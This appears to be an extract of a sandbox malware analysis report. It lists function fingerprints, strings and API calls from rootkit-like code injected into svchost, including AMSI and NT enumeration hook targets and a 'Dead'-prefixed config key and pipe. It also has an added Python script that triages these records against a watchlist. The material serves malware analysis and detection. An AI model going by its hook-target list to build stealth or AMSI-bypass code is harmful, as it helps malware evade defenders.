                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.1826644218.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 0000026A879C1D47
                                                          • Part of subcall function 0000026A879C20C0: GetModuleHandleA.KERNEL32(?,?,?,0000026A879C1D79), ref: 0000026A879C20D8
                                                          • Part of subcall function 0000026A879C20C0: GetProcAddress.KERNEL32(?,?,?,0000026A879C1D79), ref: 0000026A879C20E9
                                                          • Part of subcall function 0000026A879C5F50: GetCurrentThreadId.KERNEL32 ref: 0000026A879C5F8B
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: 9e0e29bd579a548e3cdc1013655345b337472a76a9df8295ccf8e469ac00ce0e
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: 2141A0B0111A4AA4FE84EB68ED597DC3F26E784358FC440139409371759E3ACA9EDFA3
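The fingerprint blocks on this page (API ID, String ID, Opcode ID, Instruction ID and the two fuzzy hashes the IDA plugin prints per recovered function) are easier to work with once parsed out of the rendered report. The following Python is an added example by the editor, not code from the Joe Sandbox report or from the analysed sample: it parses blocks in this shape, groups records that share an Opcode ID (the same function showing up in more than one memory dump, as 7ac826a7... does in the 17_2 and 17_3 svchost snapshots further down this page) and flags functions whose String ID references a name on an analyst-chosen watchlist. The sample input is constructed from values copied off this page; the WATCHLIST contents, and the working assumption that an identical Opcode ID denotes the same function, are the example's own choices, not something the report states.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: three "Similarity" blocks in the shape the Joe Sandbox IDA plugin
# prints on this page (values copied from the report). Blocks two and three share an
# Opcode ID but come from different svchost dumps, the case the grouping should surface.
SAMPLE = """\
• Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: AmsiScanBuffer$EnumServicesStatusExW$NtQueryDirectoryFile$NtQuerySystemInformation$amsi.dll$ntdll.dll
• API String ID: 4175298099-4225371247
• Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
• Instruction ID: 9e0e29bd579a548e3cdc1013655345b337472a76a9df8295ccf8e469ac00ce0e
• Instruction Fuzzy Hash: 2141A0B0111A4AA4FE84EB68ED597DC3F26E784358FC440139409371759E3ACA9EDFA3
• Snapshot File: hcaresult_17_3_26a87990000_svchost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c
• String ID: bad array new length
• API String ID: 190073905-1242854226
• Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
• Instruction ID: 0a4f49280b878744ad6f7ecf096596bdefc1ade17dc3b0f03a4227002bb2a120
• Instruction Fuzzy Hash: 9B8106317112418AFBE0AB65984D39D77E0FB96780F584025E90877796EF3BC9828F13
• Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c
• String ID:
• API String ID: 190073905-0
• Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
• Instruction ID: 3ee43d61a3374edd555b07b018f79bdd43d66c52f438f55532310a519593b204
• Instruction Fuzzy Hash: 4381D23160464186FFD0EB36984D3AD7AE4ABC5B80F4C8515EA0977796DB3BC9468F03
"""

@dataclass
class FunctionRecord:
    snapshot: str = ""
    api_groups: list = field(default_factory=list)   # '$'-separated API ID groups
    strings: list = field(default_factory=list)      # '$'-separated String ID entries
    opcode_id: str = ""
    instruction_id: str = ""
    instruction_fuzzy: str = ""

# "• Key: value"; the key never contains ':' but the value may (paths, offsets).
FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")

def parse_similarity_blocks(text):
    """Bullet lines -> FunctionRecord list; 'Instruction Fuzzy Hash' closes a block."""
    records, current = [], FunctionRecord()
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:          # headings, graph residue and other non-field lines
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Snapshot File":
            current.snapshot = value
        elif key == "API ID":
            current.api_groups = [g for g in value.split("$") if g]
        elif key == "String ID":
            # '$' is the plugin's separator; an empty field means no strings referenced
            current.strings = [s for s in value.split("$") if s]
        elif key == "Opcode ID":
            current.opcode_id = value
        elif key == "Instruction ID":
            current.instruction_id = value
        elif key == "Instruction Fuzzy Hash":
            current.instruction_fuzzy = value
            records.append(current)
            current = FunctionRecord()
    return records

def shared_functions(records):
    """Opcode IDs seen more than once: the same function recovered from several dumps
    (assumption of this example: identical Opcode ID means identical function)."""
    by_opcode = defaultdict(list)
    for r in records:
        by_opcode[r.opcode_id].append(r)
    return {k: v for k, v in by_opcode.items() if len(v) > 1}

# Analyst-chosen watchlist (an assumption of this example, not defined by the report):
# names whose presence in code running inside svchost merits a closer look.
WATCHLIST = {"AmsiScanBuffer", "NtQueryDirectoryFile", "NtQueryDirectoryFileEx",
             "NtQuerySystemInformation", "NtEnumerateKey", "NtEnumerateValueKey",
             "EnumServicesStatusExW", "EnumServiceGroupW", "NtResumeThread",
             "NtDeviceIoControlFile"}

def flag_watchlist(records, watchlist=WATCHLIST):
    """Map opcode_id -> sorted watchlist names referenced by that function."""
    hits = {}
    for r in records:
        matched = sorted(set(r.strings) & watchlist)
        if matched:
            hits[r.opcode_id] = matched
    return hits

if __name__ == "__main__":
    recs = parse_similarity_blocks(SAMPLE)
    for oid, group in shared_functions(recs).items():
        print(oid[:16], "seen in", sorted({r.snapshot for r in group}))
    for oid, names in flag_watchlist(recs).items():
        print(oid[:16], "references", ", ".join(names))
```

Feed it the text of a whole report instead of SAMPLE and the same two functions answer the triage questions this section raises: which recovered functions recur across the injected svchost dumps, and which of them reference AMSI or NT enumeration routines.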

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction ID: c72e3c920d632f96ad27a50e707b994269e20189d712d4fd065d8c0dcd9fa37d
                                                        • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction Fuzzy Hash: 63512972614B85C6EB94CF62E44C35EBBA1F788B99F448124DA4D57B58EF3DC049CB01
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.1826644218.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 0a4f49280b878744ad6f7ecf096596bdefc1ade17dc3b0f03a4227002bb2a120
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 9B8106317112418AFBE0AB65984D39D77E0FB96780F584025E90877796EF3BC9828F13

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: 9743a15cf823048b83f34540bfda42efa9d852315c60b7257cefcabb8bc57946
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: 7C319132600A41D7FBA0CF22A80C39EBBB0F798B95F444625DE4D63A24DF39C4568B42

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: 03d1a9572a7d3362d738f50d6cd10881688dd27bf53d8d29efc6c5760e0490ee
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: 21315C72610B429AFB90DF66A84C75E7BA1F7D4F85F444125DE4E63B24DF39C4068B02

                                                        Control-flow Graph

                                                        • Graph not reproduced in this extract. Function at 26a879c2c10; its blocks call GetModuleHandleA, GetProcAddress, StrCmpNIW and lstrlenW, plus the internal subroutines 26a879c1934, 26a879c1bbc, 26a879c1bf4, 26a879c3c70 and 26a879c89d0.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction ID: a118c866c4c1256a260de1025396f3283f424f8689449a41de93233df7f49ae5
                                                        • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction Fuzzy Hash: 43A1BE32210B8186EFA8CF25E44879D7BA5F794B94F544026DE4977B98EF36CC81CB42

                                                        Control-flow Graph

                                                        • Graph not reproduced in this extract. Function at 26a879c104c; its blocks call RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapAlloc and HeapFree.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction ID: 647327272fee3884ab25219d834b0645aca49093f317836fe7a307fa954296ab
                                                        • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction Fuzzy Hash: 77418073214B80C6EBA0CF62E44839E7BA1F389B89F448119DA8957B58DF3DC549CB01

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        • Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction ID: 24d63e7d9458ffa1667c6ee4e7ba688e8a43ab0dcf7cd4f29dc9ada9a4da1437
                                                        • Opcode Fuzzy Hash: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction Fuzzy Hash: C711E236618A4082F750CB25F44835A7FA1F389BA5F544215EAAE17AA8CF7EC549CF02

                                                        Control-flow Graph

                                                        • Graph not reproduced in this extract. Function at 26a879c7930 (CRT startup code, per the __scrt_* names); its blocks call __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c, the internal subroutines 26a879c7fe0, 26a879c7e74, 26a879c7f24, 26a879c7f9c, 26a879c7e3c, 26a879c8338, 26a879c8150, 26a879c8174, 26a879c7fcc, 26a879c81b0, 26a879c3618, 26a879c7ee4, 26a879c82fc, 26a879c7e2c, 26a879c7e58, 26a879c9dfc, 26a879c81a0, 26a879c80b8, 26a879c9d98 and 26a879c7a98, and 26a879c7930 itself.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 3ee43d61a3374edd555b07b018f79bdd43d66c52f438f55532310a519593b204
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 4381D23160464186FFD0EB36984D3AD7AE4ABC5B80F4C8515EA0977796DB3BC9468F03

                                                        Control-flow Graph

                                                        • Graph not reproduced in this extract. Function at 26a879c9930; its blocks call LoadLibraryExW twice (with GetLastError checked between the two attempts), FreeLibrary and GetProcAddress, plus the internal subroutine 26a879cae48.
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,0000026A879C9AEF,?,?,?,0000026A879C98B4,?,?,?,?,0000026A879C94A5), ref: 0000026A879C99B5
                                                        • GetLastError.KERNEL32(?,?,?,0000026A879C9AEF,?,?,?,0000026A879C98B4,?,?,?,?,0000026A879C94A5), ref: 0000026A879C99C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,0000026A879C9AEF,?,?,?,0000026A879C98B4,?,?,?,?,0000026A879C94A5), ref: 0000026A879C99ED
                                                        • FreeLibrary.KERNEL32(?,?,?,0000026A879C9AEF,?,?,?,0000026A879C98B4,?,?,?,?,0000026A879C94A5), ref: 0000026A879C9A33
                                                        • GetProcAddress.KERNEL32(?,?,?,0000026A879C9AEF,?,?,?,0000026A879C98B4,?,?,?,?,0000026A879C94A5), ref: 0000026A879C9A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: a696eec96b6663d70a0885f3b649a6c75654de3abf6a6abb57c31e6ac9d1ae5e
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: 3C31C331312A80D1FE95DB46A80879D7BA8B798BB4F5D0525DD6D2B390DF39C444CB02

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: 8743c71627c99485b78fe8a65cea421a3187629fbadfe4c96ee6183c145cb0fa
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: 1D116A32314B4086F790CB52E85831DBEB4F798FE5F044225EA5E977A4DF7AC8448B41

                                                        Control-flow Graph

                                                        control_flow_graph 427 26a879c5f50-26a879c5f77 428 26a879c5f79-26a879c5f88 427->428 429 26a879c5f8b-26a879c5f96 GetCurrentThreadId 427->429 428->429 430 26a879c5f98-26a879c5f9d 429->430 431 26a879c5fa2-26a879c5fa9 429->431 432 26a879c63cf-26a879c63e6 call 26a879c7d60 430->432 433 26a879c5fbb-26a879c5fcf 431->433 434 26a879c5fab-26a879c5fb6 call 26a879c5d80 431->434 437 26a879c5fde-26a879c5fe4 433->437 434->432 440 26a879c60b5-26a879c60d6 437->440 441 26a879c5fea-26a879c5ff3 437->441 447 26a879c623f-26a879c6250 call 26a879c78df 440->447 448 26a879c60dc-26a879c60fc GetThreadContext 440->448 443 26a879c5ff5-26a879c6038 call 26a879c89d0 441->443 444 26a879c603a-26a879c60ad call 26a879c4930 call 26a879c48d0 call 26a879c4890 441->444 455 26a879c60b0 443->455 444->455 461 26a879c6255-26a879c625b 447->461 452 26a879c6102-26a879c6123 448->452 453 26a879c623a 448->453 452->453 458 26a879c6129-26a879c6132 452->458 453->447 455->437 462 26a879c61b2-26a879c61c3 458->462 463 26a879c6134-26a879c6145 458->463 465 26a879c631e-26a879c632e 461->465 466 26a879c6261-26a879c62b8 VirtualProtect FlushInstructionCache 461->466 467 26a879c6235 462->467 468 26a879c61c5-26a879c61e3 462->468 469 26a879c6147-26a879c615c 463->469 470 26a879c61ad 463->470 471 26a879c633e-26a879c634a call 26a879c5210 465->471 472 26a879c6330-26a879c6337 465->472 474 26a879c62e9-26a879c6319 call 26a879c7ccc 466->474 475 26a879c62ba-26a879c62c4 466->475 468->467 476 26a879c61e5-26a879c622c call 26a879c3d20 468->476 469->470 478 26a879c615e-26a879c61a8 call 26a879c3d90 SetThreadContext 469->478 470->467 491 26a879c634f-26a879c6355 471->491 472->471 479 26a879c6339 call 26a879c4800 472->479 474->461 475->474 481 26a879c62c6-26a879c62e1 call 26a879c47b0 475->481 476->467 492 26a879c6230 call 26a879c78fd 476->492 478->470 479->471 481->474 493 26a879c6397-26a879c63b5 491->493 494 26a879c6357-26a879c6395 ResumeThread call 26a879c7ccc 491->494 492->467 495 26a879c63b7-26a879c63c6 493->495 496 26a879c63c9 493->496 494->491 495->496 496->432
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction ID: d3ece9226342da06a1a3bbaae611955e3353bbe06647f7ca74e4c9e7a4bd6a96
                                                        • Opcode Fuzzy Hash: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction Fuzzy Hash: 6BD18B76208B8886EAB0DB1AE49835E7BB4F3C9B84F154116EA8D57BA5CF39C541CF01
